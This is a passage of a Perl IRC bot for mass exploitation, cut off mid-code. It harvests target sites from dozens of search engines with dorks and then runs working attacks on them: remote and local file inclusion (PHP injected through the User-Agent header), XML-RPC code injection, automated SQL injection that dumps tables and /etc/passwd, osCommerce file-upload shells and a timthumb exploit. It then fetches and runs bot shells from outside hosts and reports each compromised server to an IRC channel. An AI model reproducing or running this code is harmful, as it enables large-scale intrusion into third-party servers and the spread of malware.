- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"DeMos",$type);
- } exit; }
- }
- if ($engine =~ /rose/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"RoSe",$type);
- } exit; }
- }
- if ($engine =~ /seznam/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"SeZnaM",$type);
- } exit; }
- }
- if ($engine =~ /tiscali/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"TisCali",$type);
- } exit; }
- }
- if ($engine =~ /naver/i) {
- if ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- &type($chan,$bug,$dork,"NaVeR",$type);
- } exit; }
- }
- }
- #########################################
- sub rfi() {
- my $chan = $_[0];
- my $bug = $_[1];
- my $dork = $_[2];
- my $engine = $_[3];
- my $count = 0;
- my @list = &search_engine($chan,$bug,$dork,$engine,$rfilogo);
- my $num = scalar(@list);
- if ($num > 0) {
- foreach my $site (@list) {
- $count++;
- if ($count == $num-1) { &msg("$chan","$rfilogo(4@9$engine15)10 Scan finish"); }
- my $coba = "http://".$site.$bug."test??";
- my $test = "http://".$site.$bug.$injector."??";
- my $dor = "http://".$site.$bug.$botshell."??";
- my $dor2 = "http://".$site.$bug.$botshell2."??";
- my $cek = &get_content($coba);sleep(1);
- &get_content($dor);sleep(1);
- &get_content($dor2);sleep(1);
- if ($cek =~ /failed to open stream/i) {
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- &rfi_xpl($test,$chan,$site);
- exit;}
- }
- }
- }
- }
- }
- sub rfi_xpl() {
- my $url = $_[0];
- my $chan = $_[1];
- my $site = $_[2];
- my $dor = $url.$botshell."??";
- my $dor2 = $url.$botshell2."??";
- my $test = $url.$injector."??";
- my $vuln = $url."14(ByroeNet)";
- my $check = &get_content($test);
- &get_content($dor);sleep(1);
- &get_content($dor2);sleep(1);
- if ( $check =~ /JANCOK- exploit/i ) {
- my $safe ="";
- my $os ="";
- my $free ="";
- if ($check =~ m/Software : (.*?)<\/u><\/b><\/a><br>/) {$soft = $1;}
- if ($check =~ m/SAFE MODE is (.*?)<\/b><\/font>/) {$safe = $1;}
- if ($check =~ m/OS : (.*?)<br>/) {$os = $1;}
- if ($check =~ m/Freespace : (.*?)<\/p><\/td><\/tr>/) {$free = $1;}
- &msg("$chan","$rfilogo(4@9VuLn15)13 ".$vuln."9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)(4@9safemode-off15)");
- &msg("$admin","$rfilogo(4@9VuLn15)13 ".$vuln."9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");
- }
- else {&msg("$chan","$rfilogo(4@9VuLn15)10 ".$vuln." (4@7safemode-on15)");}
- }
- sub lfi() {
- my $chan = $_[0];
- my $bug = $_[1];
- my $dork = $_[2];
- my $engine = $_[3];
- my $count = 0;
- my @list = &search_engine($chan,$bug,$dork,$engine,$lfilogo);
- my $num = scalar(@list);
- if ($num > 0) {
- foreach my $site (@list) {
- $count++;
- if ($count == $num-1) { &msg("$chan","$lfilogo(4@9$engine15)10 Scan finish"); }
- my $dir = "../../../../../../../../../../../../../";
- my $test = "http://".$site.$bug.$dir."/proc/self/environ%0000";
- my $vuln = "http://".$site."12".$bug.$dir."/proc/self/environ%0000";
- my $shell = "http://".$site."12".$bug.$dir."/tmp/ipays%0000";
- my $html = &get_content($test);
- if ($html =~ /DOCUMENT_ROOT=\// && $html =~ /HTTP_USER_AGENT/) {
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- my $code = 'echo "c0li#".php_uname()."#c0li".get_current_user();if(@copy("'.$injector.'","/tmp/ipays")) { echo "SUCCESS";@copy("'.$botshell.'","/tmp/dev");@copy("'.$botshell2.'","/tmp/maza"); }';
- my $res = lfi_env_query($test,encode_base64($code));
- &lfi_spread_query($test);
- &get_content("http://".$site.$bug.$dir."/tmp/dev%0000");sleep(2);
- &get_content("http://".$site.$bug.$dir."/tmp/maza%0000");
- $res =~ s/\n//g;
- if ($res =~ /c0li#(.*)#c0li(.*)SUCCESS/sg) {
- my $sys = $1;
- $nob0dy = $2;
- &msg("$chan","$lfilogo(4@8$engine15)15(4@9SHeLL15)13 ".$shell." 15(4@9".$sys."15))15(4@9$nob0dy15)");sleep(2);
- }
- elsif ($res =~ /c0li#(.*)#c0li(.*)/sg) {
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- my $sys = $1;
- $nob0dy = $2;
- my $upload = 'system("killall -9 perl;killall -9 php;wget '.$injector.' -O aspaltx.php;fetch '.$injector.';mv ipays.jpg aspaltx.php;wget '.$botshell.' -O byroe.php;fetch '.$botshell.';mv byroe.jpg byroe.php;wget '.$botshell2.' -O allnet.php;fetch '.$botshell2.';mv allnet.jpg allnet.php;");passthru("killall -9 perl;killall -9 php;wget '.$injector.' -O aspaltx.php;fetch '.$injector.';mv ipays.jpg aspaltx.php;wget '.$botshell.' -O byroe.php;fetch '.$botshell.';mv byroe.jpg byroe.php;wget '.$botshell2.' -O allnet.php;fetch '.$botshell2.';mv allnet.jpg allnet.php;");';
- my $wget = lfi_env_query($test,encode_base64($upload)); sleep(2);
- my $check = &get_content("http://".$site.$bug.$dir."/tmp/ipays%0000"); sleep(2);
- &get_content("http://".$site.$bug.$dir."/tmp/dev%0000");sleep(2);
- &get_content("http://".$site.$bug.$dir."/tmp/maza%0000");sleep(2);
- if ($check =~ /JANCOK- exploit/) {
- &msg("$chan","$lfilogo(4@8$engine15)15(4@9SHeLL15)13 ".$shell." 15(4@3".$sys."15)15(4@9$nob0dy15)");sleep(2);
- &msg("$admin","$lfilogo(4@8$engine15)15(4@9SHeLL15)13 ".$shell." 15(4@3".$sys."15)15(4@9$nob0dy15)");sleep(2);
- }
- else {
- &msg("$chan","$lfilogo(4@8$engine15)15(4@9SysTem15)7 ".$vuln." 15(4@3".$sys."15))15(4@9$nob0dy15)");sleep(2);
- }
- } exit; }
- }
- else { &msg("$chan","$lfilogo(4@8$engine15)15(4@9EnviRon15)10 ".$vuln); }
- } exit; } sleep(2);
- }
- }
- }
- }
- sub lfi_env_query() {
- my $url = $_[0];
- my $code = $_[1];
- my $ua = LWP::UserAgent->new(agent => "<?eval(base64_decode('".$code."'));?>");
- $ua->timeout(7);
- my $req = HTTP::Request->new(GET => $url);
- my $res = $ua->request($req);
- return $res->content;
- }
- sub lfi_spread_query() {
- my $url = $_[0];
- my $code = "system('cd /tmp;rm -rf allnet.* *.jpg.*;fetch ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;wget ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;curl -O ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;lwp-download ".$botshell.";php byroe.jpg;fetch ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;wget ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;curl -O ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;lwp-download ".$botshell2.";php allnet.jpg;cd /var/tmp;fetch ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;wget ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;curl -O ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;lwp-download ".$botshell.";php byroe.jpg;fetch ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;wget ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;curl -O ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;lwp-download ".$botshell2.";php allnet.jpg;rm -rf *.jp*;');";
- my $ua = LWP::UserAgent->new(agent => "<?eval(base64_decode('".encode_base64($code)."'));?>");
- $ua->timeout(7);
- my $req = HTTP::Request->new(GET => $url);
- my $res = $ua->request($req);
- }
- sub xml() {
- my $chan = $_[0];
- my $bug = $_[1];
- my $dork = $_[2];
- my $engine = $_[3];
- my $count = 0;
- my @list = &search_engine($chan,$bug,$dork,$engine,$xmllogo);
- my $num = scalar(@list);
- if ($num > 0) {
- foreach my $site (@list) {
- $count++;
- if ($count == $num-1) { &msg("$chan","$xmllogo(4@8$engine15)10 Scan finish"); }
- my $test = "http://".$site.$bug;
- my $vuln = "http://".$site."13".$bug;
- my $html = &get_content($test);
- if ($html =~ /faultCode/ ) {
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- my $resp = &xml_cek_query($test);
- if ($resp =~ /j13mb0t(.*)j13mb0t/s) {
- &xml_spread_query($test);sleep(2);
- my $sys = $1;
- my $check = &get_content("http://".$site."aspaltx.php");
- &get_content("http://".$site."byroe.php");
- &get_content("http://".$site."allnet.php");
- if ($check =~ /JANCOK- exploit/) {
- &msg("$chan","$xmllogo(4@8$engine15)15(13@9SheLL15)13 http://".$site."7aspaltx.php 3".$sys);&get_content("http://".$site."byroe.php"); sleep(2);}
- else {
- &msg("$chan","$xmllogo(4@8$engine15)15(4@9SysTem15)7 ".$vuln." 3".$sys); sleep(2);}
- }
- sleep(2); } exit; } }
- }
- }
- }
- sub xml_cek_query() {
- my $url = $_[0];
- my $code = "system('uname -a');";
- my $ua = LWP::UserAgent->new(agent => 'perl post');
- $exploit = "<?xml version=\"1.0\"?><methodCall>";
- $exploit .= "<methodName>test.method</methodName>";
- $exploit .= "<params><param><value><name>',''));";
- $exploit .= "echo'j13mb0t';".$code."echo'j13mb0t';exit;/*</name></value></param></params></methodCall>";
- $ua->timeout(7);
- my $res = $ua->request(POST $url, Content_Type => 'text/xml', Content => $exploit);
- return $res->content;
- }
- sub xml_spread_query() {
- my $xmltargt = $_[0];
- my $xmlsprd = "system('wget ".$injector." -O aspaltx.php;fetch ".$injector.";mv ipays.jpg aspaltx.php;wget ".$botshell." -O byroe.php;fetch ".$botshell.";mv byroe.jpg byroe.php;wget ".$botshell2." -O allnet.php;fetch ".$botshell2.";mv allnet.jpg allnet.php;killall -9 perl;killall -9 php;cd /tmp;rm -rf dor.* *.jpg.*;fetch ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;wget ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;curl -O ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;lwp-download ".$botshell.";php byroe.jpg;fetch ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;wget ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;curl -O ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;lwp-download ".$botshell2.";php allnet.jpg;cd /var/tmp;rm -rf dor.* *.jpg.*;fetch ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;wget ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;curl -O ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;lwp-download ".$botshell.";php byroe.jpg;fetch ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;wget ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;curl -O ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;lwp-download ".$botshell2.";php allnet.jpg;');";
- my $userAgent = LWP::UserAgent->new(agent => 'perl post');
- $exploit = "<?xml version=\"1.0\"?><methodCall>";
- $exploit .= "<methodName>test.method</methodName>";
- $exploit .= "<params><param><value><name>',''));";
- $exploit .= "echo'j13m';".$xmlsprd."echo'b0T';exit;/*</name></value></param></params></methodCall>";
- $userAgent->timeout(7);
- $userAgent->request(POST $xmltargt, Content_Type => 'text/xml', Content => $exploit);
- }
- sub sql() {
- my $chan = $_[0];
- my $bug = $_[1];
- my $dork = $_[2];
- my $engine = $_[3];
- my $count = 0;
- my @list = &search_engine($chan,$bug,$dork,$engine,$sqllogo);
- my $num = scalar(@list);
- if ($num > 0) {
- foreach my $site (@list) {
- $count++;
- if ($count == $num-1) { &msg("$chan","$sqllogo(4@8$engine15)10 Scan finish"); }
- my $test = "http://".$site.$bug."'";
- my $vuln = "http://".$site."4".$bug;
- my $sqlsite = "http://".$site.$bug;
- my $html = &get_content($test);
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- if ($html =~ m/You have an error in your SQL syntax/i || $html =~ m/Query failed/i || $html =~ m/SQL query failed/i ) {
- &sqlbrute($sqlsite,$chan,$engine);}
- elsif ($html =~ m/ODBC SQL Server Driver/i || $html =~ m/Unclosed quotation mark/i || $html =~ m/Microsoft OLE DB Provider for/i ) {
- &msg("$chan","$sqllogo(4@8$engine15)15(4@9MsSQL15)13 ".$vuln);}
- elsif ($html =~ m/Microsoft JET Database/i || $html =~ m/ODBC Microsoft Access Driver/i || $html =~ m/Microsoft OLE DB Provider for Oracle/i ) {
- &msg("$chan","$sqllogo(4@8$engine15)15(4@9MsAccess15)13 ".$vuln);}
- elsif ($html =~ m/mysql_/i || $html =~ m/Division by zero in/i || $html =~ m/mysql_fetch_array/i ) {
- &sqlbrute($sqlsite,$chan,$engine);}
- } exit; sleep(2); }
- }
- }
- }
- sub sqlbrute() {
- my $situs=$_[0];
- my $chan =$_[1];
- my $engine=$_[2];
- my $columns=20;
- my $cfin.="--";
- my $cmn.= "+";
- for ($column = 0 ; $column < $columns ; $column ++)
- {
- $union.=','.$column;
- $inyection.=','."0x6c6f67696e70776e7a";
- if ($column == 0)
- {
- $inyection = '';
- $union = '';
- }
- $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cfin;
- $response=get($sql);
- if($response =~ /loginpwnz/)
- {
- $column ++;
- $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cfin;
- &msg("$chan","$sqllogo(4@8$engine15)15(4@9SQL15)13 $sql ");
- $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."information_schema.tables".$cfin;
- $response=get($sql)or die("[-] Impossible to get Information_Schema\n");
- if($response =~ /loginpwnz/)
- {
- $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."information_schema.tables".$cfin;
- &msg("$chan","$sqllogo(4@8$engine15)15(4@9SQL15)(4@13INFO_SCHEMA15)13 $sql ");
- }
- $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."mysql.user".$cfin;
- $response=get($sql)or die("[-] Impossible to get MySQL.User\n");
- if($response =~ /loginpwnz/)
- {
- $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."mysql.user".$cfin;
- &msg("$chan","$sqllogo(4@8$engine15)15(4@9SQL15)(4@13USER15)13 $sql ");
- }
- else
- {
- }
- while ($loadcont < $column-1)
- {
- $loadfile.=','.'load_file(0x2f6574632f706173737764)';
- $loadcont++;
- }
- $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."load_file(0x2f6574632f706173737764)".$loadfile.$cfin;
- $response=get($sql)or die("[-] Impossible to inject LOAD_FILE\n");
- if($response =~ /root:x:/)
- {
- &msg("$chan","$sqllogo(4@8$engine15)15(4@9SQL15)(4@13Load File15)13 $sql ");
- }
- else
- {
- }
- foreach $tabla(@tabele)
- {
- chomp($tabla);
- $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn.$tabla.$cfin;
- $response=get($sql)or die("[-] Impossible to get tables\n");
- if($response =~ /loginpwnz/)
- {
- $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn.$tabla.$cfin;
- &msg("$chan","$sqllogo(4@8$engine15)15(4@9SQL15)(4@13Tabel15)13 $sql ");
- &tabelka($situs,$tabla,$chan,$engine);
- }
- }
- }
- }
- }
- sub tabelka() {
- my $situs =$_[0];
- my $tabla =$_[1];
- my $chan =$_[2];
- my $engine=$_[3];
- my $cfin.="--";
- my $cmn.= "+";
- chomp($tabla);
- foreach $columna(@kolumny)
- {
- chomp($columna);
- $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."concat(0x6c6f67696e70776e7a,0x3a,$columna)".$inyection.$cmn."from".$cmn.$tabla.$cfin;
- $response=get($sql)or die("[-] Impossible to get columns\n");
- if ($response =~ /loginpwnz/)
- {
- &msg("$chan","$sqllogo(4@8$engine15)15(4@9SQL15)(4@13SQLi Vuln15)9 $situs 14(4@13Kolom14)13 $columna 14(4@13Tabel14)13 $tabla ");
- }
- }
- }
- sub osco() {
- my $chan = $_[0];
- my $bug = $_[1];
- my $dork = $_[2];
- my $engine = $_[3];
- my $count = 0;
- my @list = &search_engine($chan,$bug,$dork,$engine,$oscologo);
- my $num = scalar(@list);
- if ($num > 0) {
- foreach my $site (@list) {
- $count++;
- if ($count == $num-1) { &msg("$chan","$oscologo(4@8$engine15)10 Scan finish"); }
- my $test = "http://".$site.$bug;
- my $html = &get_content($test);
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- if ($html =~ /Warning: No file uploaded/ ) {
- # &msg("$chan","$oscologo(4@8$engine15)15(4@9System15)7 ".$test);
- &osco_xpl($test,$chan,$site,$engine);
- } else { }
- } exit; sleep(2); }
- }
- }
- }
- sub osco_xpl() {
- my $browser = LWP::UserAgent->new;
- my $url = $_[0];
- my $chan = $_[1];
- my $site = $_[2];
- my $engine = $_[3];
- my $res = $browser->post( $url,['products_image' => ['./ipays.jpg' => 'bronsx.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
- my $resa = $browser->post( $url,['products_image' => ['./maza.jpg' => 'aspaltx.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
- my $resb = $browser->post( $url,['products_image' => ['./byroe.jpg' => 'byroe.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
- my $resc = $browser->post( $url,['products_image' => ['./allnet.jpg' => 'allnet.html' => 'application/octet-stream']],'Content-Type' => 'form-data');
- my $hasil = $res->as_string;
- my $hasil1 = $resa->as_string;
- my $hasil2 = $resb->as_string;
- my $hasil3 = $resc->as_string;
- my $check = &get_content("http://".$site."images/aspaltx.php");&get_content("http://".$site."images/byroe.php");&get_content("http://".$site."images/allnet.html");sleep(3);
- if ($check =~ /JANCOK- exploit/) {
- my $safe ="";
- my $os ="";
- my $free ="";
- if ($check =~ m/Software : (.*?)<\/u><\/b><\/a><br>/) {$soft = $1;}
- if ($check =~ m/SAFE MODE is (.*?)<\/b><\/font>/) {$safe = $1;}
- if ($check =~ m/OS : (.*?)<br>/) {$os = $1;}
- if ($check =~ m/Freespace : (.*?)<\/p><\/td><\/tr>/) {$free = $1;}
- &msg("$chan","$oscologo(4@8$engine15)15(4@9SHeLL15)13 http://".$site."images/4aspaltx.php 9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");sleep(2);
- &msg("$admin","$oscologo(4@8$engine15)15(4@9SHeLL15)13 http://".$site."images/4allnet.html 9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");sleep(2);
- }
- }
- sub osco2() {
- my $chan = $_[0];
- my $bug = $_[1];
- my $dork = $_[2];
- my $engine = $_[3];
- my $count = 0;
- my @list = &search_engine($chan,$bug,$dork,$engine,$oscologo);
- my $num = scalar(@list);
- if ($num > 0) {
- foreach my $site (@list) {
- $count++;
- if ($count == $num-1) { &msg("$chan","$oscologo(4@8$engine15)10 Scan finish"); }
- my $test = "http://".$site.$bug;
- my $html = &get_content($test);
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- if ($html =~ /TABLE_HEADING_FILENAME/ ) {
- # &msg("$chan","$oscologo(4@8$engine15)15(4@9System15)7 ".$test);
- &osco_xpl2($test,$chan,$site,$engine);
- } else { }
- } exit; sleep(2); }
- }
- }
- }
- sub osco_xpl2() {
- my $browser = LWP::UserAgent->new;
- my $url = $_[0]."?action=processuploads";
- my $chan = $_[1];
- my $site = $_[2];
- my $engine = $_[3];
- my $res = $browser->post( $url,['file_1' => ['./ipays.jpg' => 'bronsx.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
- my $resa = $browser->post( $url,['file_1' => ['./maza.jpg' => 'aspaltx.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
- my $resb = $browser->post( $url,['file_1' => ['./byroe.jpg' => 'byroe.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
- my $resc = $browser->post( $url,['file_1' => ['./allnet.jpg' => 'allnet.html' => 'application/octet-stream']],'Content-Type' => 'form-data');
- my $hasil = $res->as_string;
- my $hasil1 = $resa->as_string;
- my $hasil2 = $resb->as_string;
- my $hasil3 = $resc->as_string;
- my $check = &get_content("http://".$site."images/aspaltx.php");&get_content("http://".$site."images/byroe.php");&get_content("http://".$site."images/allnet.html");sleep(3);
- if ($check =~ /JANCOK- exploits/) {
- my $safe ="";
- my $os ="";
- my $free ="";
- if ($check =~ m/Software : (.*?)<\/u><\/b><\/a><br>/) {$soft = $1;}
- if ($check =~ m/SAFE MODE is (.*?)<\/b><\/font>/) {$safe = $1;}
- if ($check =~ m/OS : (.*?)<br>/) {$os = $1;}
- if ($check =~ m/Freespace : (.*?)<\/p><\/td><\/tr>/) {$free = $1;}
- &msg("$chan","$oscologo(4@8$engine15)15(4@9SHeLL15)13 http://".$site."images/4aspaltx.php 9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");sleep(2);
- &msg("$admin","$oscologo(4@8$engine15)15(4@9SHeLL15)13 http://".$site."images/4allnet.html 9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");sleep(2);
- }
- }
- sub loko() {
- my $chan = $_[0];
- my $bug = $_[1];
- my $dork = $_[2];
- my $engine = $_[3];
- my $count = 0;
- my @list = &search_engine($chan,$bug,$dork,$engine,$lokologo);
- my $num = scalar(@list);
- if ($num > 0) {
- foreach my $site (@list) {
- $count++;
- if ($count == $num-1) { &msg("$chan","$lokologo(4@8$engine15)10 Scan finish"); }
- my $test = "http://".$site."filemanager/browser.html";
- my $vuln = "http://".$site."filemanager/browser.html";
- my $re = &get_content($test);
- if ($re =~ /$loko_output/){
- &msg("$chan", "$lokologo(4@8$engine15)(4@13VulN15)13 ".$vuln."15(4@0UPLOAD15)");
- }
- }
- }
- }
- sub op() {
- my $chan = $_[0];
- my $bug = $_[1];
- my $dork = $_[2];
- my $engine = $_[3];
- my $count = 0;
- my @list = &search_engine($chan,$bug,$dork,$engine,$oplogo);
- my $num = scalar(@list);
- if ($num > 0) {
- foreach my $site (@list) {
- $count++;
- if ($count == $num-1) { &msg("$chan","$oplogo(4@8$engine15)10 Scan finish"); }
- my $test = "http://".$site.$open_test;
- my $vuln = "http://".$site."admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html";
- my $re = &get_content($test);
- if ($re =~ /$open_output/){
- &msg("$chan", "$oplogo(4@8$engine15)(4@13VulN15)13 ".$vuln."15(4@0UPLOAD15)");
- }
- }
- }
- }
- sub zen() {
- my $chan = $_[0];
- my $bug = $_[1];
- my $dork = $_[2];
- my $engine = $_[3];
- my $count = 0;
- my @list = &search_engine($chan,$bug,$dork,$engine,$zenlogo);
- my $num = scalar(@list);
- if ($num > 0) {
- foreach my $site (@list) {
- $count++;
- if ($count == $num-1) { &msg("$chan","$zenlogo(4@8$engine15)10 Scan finish"); }
- my $test = "http://".$site."admin/record_company.php/password_forgotten.php?action=insert";
- my $vuln = "http://".$site."images/4brons.php";
- my $que = "INSERT INTO admin (admin_id, admin_name, admin_email, admin_pass) VALUES (56,'adminsys','admin@mazacrew.co.cc','617ec22fbb8f201c366e9848c0eb6925:87');";
- my $re = &get_content($vuln);
- if ($re =~ /JANCOK- exploit/i){
- &msg("$chan", "$zenlogo(4@8$engine15)(4@13Shell15)13 ".$vuln."");
- }
- else{
- # &msg("$chan", "$zenlogo(4@8$engine15)(4@13GaGaL15)4 ".$vuln."15(4@9Ab0rteD15)");
- }
- }
- }
- }
- ######################################### ADDED
- sub thumb() {
- my $chan = $_[0];
- my $bug = $_[1];
- my $dork = $_[2];
- my $engine = $_[3];
- my $count = 0;
- my @list = &search_engine($chan,$bug,$dork,$engine,$thumblogo);
- my $num = scalar(@list);
- if ($num > 0) {
- foreach my $site (@list) {
- $count++;
- if ($count == $num-1) { &msg("$chan","$thumblogo(4@9$engine15)10 Scan finish"); }
- my $coba = "http://".$site.$bug."timthumb.php?src=".$thumbshell."";
- my $cek = &get_content($coba);sleep(1);
- my $aa = "cache/c54af1d13e884a4c63da8f3098a7a4da.php";
- my $ab = "temp/c54af1d13e884a4c63da8f3098a7a4da.php";
- my $ceck1 = "http://".$site.$bug.".$aa";
- my $ceck2 = "http://".$site.$bug.".$ab";
- my $loco1 = &get_content($ceck1);sleep(1);
- my $loco2 = &get_content($ceck2);sleep(1);
- if ($cek =~ /tripl3k was Here/i) {
- my $vuln = "http://".$site.$bug."cache/c54af1d13e884a4c63da8f3098a7a4da.php";
- &msg("$chan", "$thumblogo(4@8$engine15)(4@4VulN15)4 ".$vuln." 15(4@9 0WN3D 15)");
- }
- }
- }
- }
- #########################################
- sub search_engine() {
- my (@total,@clean);
- my $chan = $_[0];
- my $bug = $_[1];
- my $dork = $_[2];
- my $engine = $_[3];
- my $logo = $_[4];
- if ($engine eq "GooGLe") { my @google = &google($dork); push(@total,@google); }
- if ($engine eq "ReDiff") { my @rediff = &rediff($dork); push(@total,@rediff); }
- if ($engine eq "Bing") { my @bing = &bing($dork); push(@total,@bing); }
- if ($engine eq "ALtaViSTa") { my @altavista = &altavista($dork); push(@total,@altavista); }
- if ($engine eq "YahOo") { my @yahoo = &yahoo($dork); push(@total,@yahoo); }
- if ($engine eq "AsK") { my @ask = &ask($dork); push(@total,@ask); }
- if ($engine eq "UoL") { my @uol = &uol($dork); push(@total,@uol); }
- if ($engine eq "CluSty") { my @clusty = &clusty($dork); push(@total,@clusty); }
- if ($engine eq "GutSer") { my @gutser = &gutser($dork); push(@total,@gutser); }
- if ($engine eq "GooGle2") { my @google2 = &google2($dork); push(@total,@google2); }
- if ($engine eq "ExaLead") { my @exalead = &exalead($dork); push(@total,@exalead); }
- if ($engine eq "LyCos") { my @lycos = &lycos($dork); push(@total,@lycos); }
- if ($engine eq "VirgiLio") { my @virgilio = &virgilio($dork); push(@total,@virgilio); }
- if ($engine eq "WebDe") { my @webde = &webde($dork); push(@total,@webde); }
- if ($engine eq "HotBot") { my @hotbot = &hotbot($dork); push(@total,@hotbot); }
- if ($engine eq "AoL") { my @aol = &aol($dork); push(@total,@aol); }
- if ($engine eq "SaPo") { my @sapo = &sapo($dork); push(@total,@sapo); }
- if ($engine eq "DuCk") { my @duck = &duck($dork); push(@total,@duck); }
- if ($engine eq "LyGo") { my @lygo = &lygo($dork); push(@total,@lygo); }
- if ($engine eq "YauSe") { my @yause = &yause($dork); push(@total,@yause); }
- if ($engine eq "BaiDu") { my @baidu = &baidu($dork); push(@total,@baidu); }
- if ($engine eq "KiPoT") { my @kipot = &kipot($dork); push(@total,@kipot); }
- if ($engine eq "GiBLa") { my @gibla = &gibla($dork); push(@total,@gibla); }
- if ($engine eq "BLacK") { my @black = &black($dork); push(@total,@black); }
- if ($engine eq "oNeT") { my @onet = &onet($dork); push(@total,@onet); }
- if ($engine eq "SiZuka") { my @sizuka = &sizuka($dork); push(@total,@sizuka); }
- if ($engine eq "WaLLa") { my @walla = &walla($dork); push(@total,@walla); }
- if ($engine eq "DeMos") { my @demos = &demos($dork); push(@total,@demos); }
- if ($engine eq "RoSe") { my @rose = &rose($dork); push(@total,@rose); }
- if ($engine eq "SeZnaM") { my @seznam = &seznam($dork); push(@total,@seznam); }
- if ($engine eq "TisCali") { my @tiscali = &tiscali($dork); push(@total,@tiscali); }
- if ($engine eq "NaVeR") { my @naver = &naver($dork); push(@total,@naver); }
- @clean = &clean(@total);
- &msg("$chan","$logo(4@8$engine15)4 Total:0 (".scalar(@total).")4 Clean:0 (".scalar(@clean).")");
- return @clean;
- }
- #########################################
- sub isFound() {
- my $status = 0;
- my $link = $_[0];
- my $reqexp = $_[1];
- my $res = &get_content($link);
- if ($res =~ /$reqexp/) { $status = 1 }
- return $status;
- }
- sub get_content() {
- my $url = $_[0];
- my $ua = LWP::UserAgent->new(agent => $uagent);
- $ua->timeout(7);
- my $req = HTTP::Request->new(GET => $url);
- my $res = $ua->request($req);
- return $res->content;
- }
- ######################################### SEARCH ENGINE gibla
- sub google() {
- my @list;
- my $key = $_[0];
- for (my $i=0; $i<=400; $i+=10){
- my $search = ("http://www.google.com/search?q=".&key($key)."&num=100&filter=0&start=".$i);
- my $res = &search_engine_query($search);
- while ($res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g) {
- if ($1 !~ /google/){
- my $link = $1;
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub rediff() {
- my @list;
- my $key = $_[0];
- for (my $i=0; $i<=500; $i+=10) {
- my $search = ("http://search1.rediff.com/dirsrch/default.asp?MT=".&key($key)."&iss=&submit=Search&firstres=".$i);
- $b = "$i";
- my $res = &search_engine_query($search);
- if ($res !~ /firstres=$b\'>/) {$i=500;}
- while ($res =~ m/<a href=\"http:\/\/(.*?)\" onmousedown/g) {
- if ($1 !~ /rediff\.com/){
- my $link = $1;
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub uol() {
- my @list;
- my $key = $_[0];
- for (my $i=1; $i<=500; $i+=10) {
- my $search = ("http://mundo.busca.uol.com.br/buscar.html?q=".&key($key)."&start=".$i);
- my $res = &search_engine_query($search);
- if ($res !~ m/<span class=\"next\">próxima<\/span>/){$i=500;}
- while ($res =~ m/<a href=\"http:\/\/([^>\"]*)/g) {
